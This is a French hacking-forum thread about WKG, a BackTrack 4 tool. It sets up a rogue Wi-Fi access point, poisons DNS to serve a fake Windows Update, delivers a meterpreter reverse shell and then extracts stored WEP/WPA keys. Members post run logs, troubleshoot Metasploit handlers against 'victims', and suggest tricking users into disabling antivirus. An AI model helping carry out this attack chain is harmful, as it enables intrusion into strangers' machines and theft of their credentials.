Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-08-2009 12:26:18

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Voici un outil intéressant développé par hm2075, un membre très actif du forum Remote-exploit. Cet outil est un peu similaire à AtxWPA, mais il a été conçu pour tourner sous la toute dernière version de Backtrack, la version 4 Pre Finale.

Voila comment fonctionne WKG:

-WKG va créer une Rogue AP (un faux point d'accès)
-La victime se connecte sur la Rogue AP
-La victime est redirigée vers une fausse page de mise à jour windows update
-Si la victime ne télécharge pas la mise à jour, elle est bloquée et ne peut pas se connecter
-En guise de mise à jour, la victime va télécharger un meterpreter reverse exe
-Wirelesskeyview est uploadé et exécuté sur la machine de la victime, toutes les clés WEP et WPA stockées dans le registre sont récupérées
-La victime peut maintenant surfer, vous pouvez lancer le sniff, une attaque mitm avec SSLStrip ou autre...

WKG est conçu pour tourner sur BT4 Pre Finale, il est fonctionnel sur des clients utilisant Windows XP. Voici le lien du sujet sur le forum Remote-exploit: Wireless Key Grabber (WKG) Fully automated ainsi que la vidéo de démonstration:

Wireless Key Grabber

Liens utiles:

-Pastebin
-WKG Download (MU)

Have some fun wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-08-2009 17:42:24

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Tres interressent M1ck3y merci .
Se bt4 me nargue je vais finir par cedé et remplacer mon bt3 par bt4 , c'est bete que WKG ne roule pas sur bt3.


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#3 31-08-2009 16:46:03

thry
Nouveau membre
Inscription : 28-08-2009
Messages : 8

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Juste une question. Est ce que une victime connecté en WPA se connectera à la fake AP? J'avais entendu dire que non. Je me trompe peut être.

Hors Ligne

#4 31-08-2009 17:47:41

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

La victime connectée en WPA se connectera à la fake AP seulement si son gestionnaire de connexion wifi est parametré pour se connecter automatiquement à un réseau open (faille windows zero). Tu peux le voir assez facilement si la station diffuse une liste d'essids avec des noms de hotspots par exemple.

Hors Ligne

#5 01-09-2009 14:57:39

thry
Nouveau membre
Inscription : 28-08-2009
Messages : 8

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Donc, en gros, une chance sur 10.

Dernière modification par thry (01-09-2009 18:30:03)

Hors Ligne

#6 01-09-2009 17:46:42

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Je suis passer a bt4 en dure et je test en se moment il a falu que je modifie simplement les liens par raport a ma config j'ai juste un dernier prob que je n'arrive pas a résoudre.

[email protected]:/home/cool/WK# ls
AnalizeDNS.class  keys                       ServerKernelProgram.java
AnalizeDNS.java   lighttpd.conf              update.exe
bytecode          lighttpd.conf~             vista_mu_subbanner-part1_ltr.gif
dhcpd.conf        script.txt                 vista_subbanner-part2_ltr.gif
hb.rb             script.txt~                WindVista_masthead_ltr.gif
hb.rc             ServerKernelMain.class     wkg.sh
hb.rc~            ServerKernelMain.java      wkg.sh~
index.html        ServerKernelProgram.class  wkv.exe
[email protected]:/home/cool/WK# ./wkg.sh
Wireless Key Grabber
Have you downloaded lighttpd? if not open a shell and type apt-get install lighttpd
Have you extracted the required files? They should reside in /root/WK
Starting Wireless Key Grabber
Copying dhcpd.conf
Copied dhcpd.conf
Setting up FakeAP, this is a standard AP, use -P for extended features


Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
28360   wpa_supplicant
28610   dhclient
Process with PID 28360 (wpa_supplicant) is running on interface wlan1
Process with PID 28610 (dhclient) is running on interface wlan1


Interface       Chipset         Driver

wlan1           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)
wlan0           Ralink 2573 USB rt73usb - [phy2]

FakeAp started
Loading Metasploit with hb.rc
Metasploit should be loading, keep an eye on metasploit for victims
Setting up IPTABLES
Stopping DHCP server: dhcpd3.
Starting DHCP server: dhcpd3.
IPTABLES updated and dhcp server started
starting webserver
Stopping web server: lighttpd.
2009-09-01 18:25:15: (configfile.c.1136) base-docroot doesn't exist: /root/WK
2009-09-01 18:25:15: (server.c.591) setting default values failed
Web server started
Starting dns redirector
DNS poison started, check DNS poison if victims are being redirected to our webserver
Check out /home/cool/WK/keys folder, random text files should be generated which contains the victims wireless keys once they have been exploited
Opening WKV folder, keys will be uploaded in here
./wkg.sh: line 95: konqueror: command not found
[email protected]:/home/cool/WK#       

Comme indiqué ci-dessus "konqueror command not found".


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#7 06-09-2009 00:17:49

Raphu
Membre Indétronable
Lieu : localhost
Inscription : 09-06-2009
Messages : 192

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Plusieurs remarques.

Pour thry, pas mal de monde à un bon vieux hotspot Neuf Wifi, et bientôt Free Wifi open enregistré dans sa liste de réseaux dans fil, je trouve ^^

Pour sardineemule, malgré que ca bug à la fin (pour ouvrir le dossier contenant les infos renvoyées par le meterpreter), tout à l'air lancé. T'as essayé de continuer l'attaque? smile

Mon avis sur le tool :
-Vachement agréable à manipuler.
-Serait surement plus crédible avec une page de MAJ de navigateur, encore faudrais-il la coder tongue
-Fait hurler les antivirus, et le parfeu windows vista (normal quoi lol)
-Ne fait pas hurler le parfeu windows xp (ca c'est honteux!)

Conclusion : Un outil qui pourrais être bien utile avec une belle page de MAJ navigateur qui demande gentiment à l'utilisateur ciblé de désactiver son antivirus pour que la MAJ puisse se dérouler convenablement.

Hors Ligne

#8 06-09-2009 10:02:37

sardineeMule
Membre Irremplaçable
Inscription : 05-12-2008
Messages : 1 139
Site Web

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Merci Raphu je testerais plus tard la jeme casse la tete a installer correctement xplico.


title.jpg N'oubliez pas le site http://www.crack-wifi.com/
  nux  hight.jpg

Hors Ligne

#9 11-02-2010 10:48:10

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Bonjour,

J'ai télécharger le fichier et essayé de comprendre le programme mais je bloque.
Je lance le scipt wkh.sh et je me connecte sur le Fake AP depuis un PC Windows XP SP3 Firewall désactivé.
Le PC ne peut pas accèder au page demandées et il est redirectionné sur une page qui demande une fausse mise a jour. Donc jusque la, tout fonctionne bien.

Je télécharge la mise a jour et je l''exécute. Dans ma fenetre Metasploit, il s'affiche " Sending Stage ", :

Starting the payload handler..
msfexploit (handler) > * Sending Stage ( 775504 bytes )



...puis plus rien...!!!! :-(


( Je précise que je n'ai touché à aucun fichier du dossier WK et que FrameWork 3 est à jour !  )

Merci de m'aider,

Dernière modification par us3r (11-02-2010 11:52:27)

Hors Ligne

#10 11-02-2010 13:21:43

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Peut-être que XP SP3 est simplement immunisé face à l'attaque ? smile C'est le problème avec les exploits Metasploit, à moins d'être très récent, ils sont en général déjà corrigés sur une machine "à jour" hmm

Si tu as une machine virtuelle, tu peux faire l'essai avec un SP2 "vanilla" (c-à-d sans aucune mise à jour), pour comparer...

Hors Ligne

#11 11-02-2010 18:43:09

El-Kodar
Membre Radioactif
Lieu : Liège, Belgique
Inscription : 06-02-2010
Messages : 68

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Bonjour

Un tool très utile à première vue mais est-il détecté par tout les anti-virus ? Quelle utilité alors ?

Guillaume


Il est dit que seul 4 personnes comprenaient Einstein ... Est-ce parce que personne ne vous comprend que vous êtes un génie ?

Hors Ligne

#12 11-02-2010 21:33:32

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Merci. Et ou puis-je trouver un windows "Vanilla" ?

Hors Ligne

#13 11-02-2010 22:25:42

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Heu, dans une boîte en carton officielle avec un hologramme et un prix qui fait peur ? big_smile

Tu n'as qu'à installer ton Windows XP SP2 officiel que tu as acheté légalement il y a quelques années... Ou trouver une version crackée d'une façon ou d'une autre sur un torrent quelconque, c'est pas ce qui manque.

Soyons clair, ceci n'est PAS une incitation au Warez, c'est juste à des fins de test ! (jveux pas risquer le ban, moi ! lol)

Hors Ligne

#14 11-02-2010 22:34:01

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Je viens de réinstaller en Virtual mon vieux Windows XP PRO sans service pack !!!

Hors Ligne

#15 12-02-2010 16:17:17

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Je ne comprends pas comment configurer le fichier dhcdpd.conf pour donner l'access internet à la victime apres qu'elle télécharge le fichier.
Pouvez-vous m'aider ?

Hors Ligne

#16 12-02-2010 19:08:33

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

salut

essaye télécharge ceci le fichier et place le dans cd /pentest/exploits/framework3/dhcpd.conf

dhcpd.conf

tiens nous au courant de tes testes si j'ai le temps je ferais un tuto sur un truc de dingue mais c pas pour de suite mais j'y pense smile

Hors Ligne

#17 12-02-2010 19:30:27

us3r
Membre Hyperactif
Lieu : Besancon
Inscription : 26-10-2009
Messages : 61

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

Salut,

C'est gentil, mais je possède déja ce fichier. Mais je pense qu'il faut le reconfigurer avec les IP de ma box et tout ca mais je ne comprends pas comment faire.
En gros, je voudrais donner l'accès internet à la victime...
J'ai déja expliqué mon probleme plus haut : J'obtiens au message :

Starting the payload handler..
msfexploit (handler) > * Sending Stage ( 775504 bytes )

I need help...;-)

Hors Ligne

#18 06-10-2010 02:27:35

tinou35
N00b
Inscription : 06-10-2010
Messages : 4

Re : WKG (Wireless Key Grabber) pour Backtrack 4 Pre Finale

merci pour cette appli mais j'ai un problème avec je l'ai lancer et ca a marché une fois je ne sais comment sur ma neuf wpa et maintenant impossible de le refaire j'ai la r1 en vmware, pourrais-je avoir de l'aide pour le faire fonctionner merci. aussi je n'ai jamais vue la page de windows update merci ecore et bonne journée a tous

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.031 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]